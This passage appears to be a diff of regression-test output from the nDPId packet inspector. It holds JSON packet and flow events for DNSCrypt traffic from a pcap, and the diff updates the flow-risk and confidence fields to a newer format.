 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1YgAL0RcE4KAAABizvIdKpxAbsGBMEKc5QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":106,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1YAub0RlSEKAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":106,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1cgAL0RcE0KAAABizvIdJLbAbsGBNikc5ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":108,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1cAub0RlSAKAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":108,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1ggAL0RcEwKAAABizvIdOc6AbsGBIRDc5IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":110,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1gAub0RlR8KAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":110,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":946739305187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739305187,"pkt":"ZmZmZmZmRERERERECABFAADSF51AADcRFxKLO8h0CgAAAQG76FQAvuw2c5WBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="}
@@ -241,27 +241,27 @@
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":946739305191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739305191,"pkt":"ZmZmZmZmRERERERECABFAADSF6FAADcRFw6LO8h0CgAAAQG7qnEAviobc5SBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZYtAAL0RdE4KAAABwx5eHLr5IPsCCOQQMs4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZYwgAL0RkI0KAAABwx5eHIJZIPsGBDAsMssBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA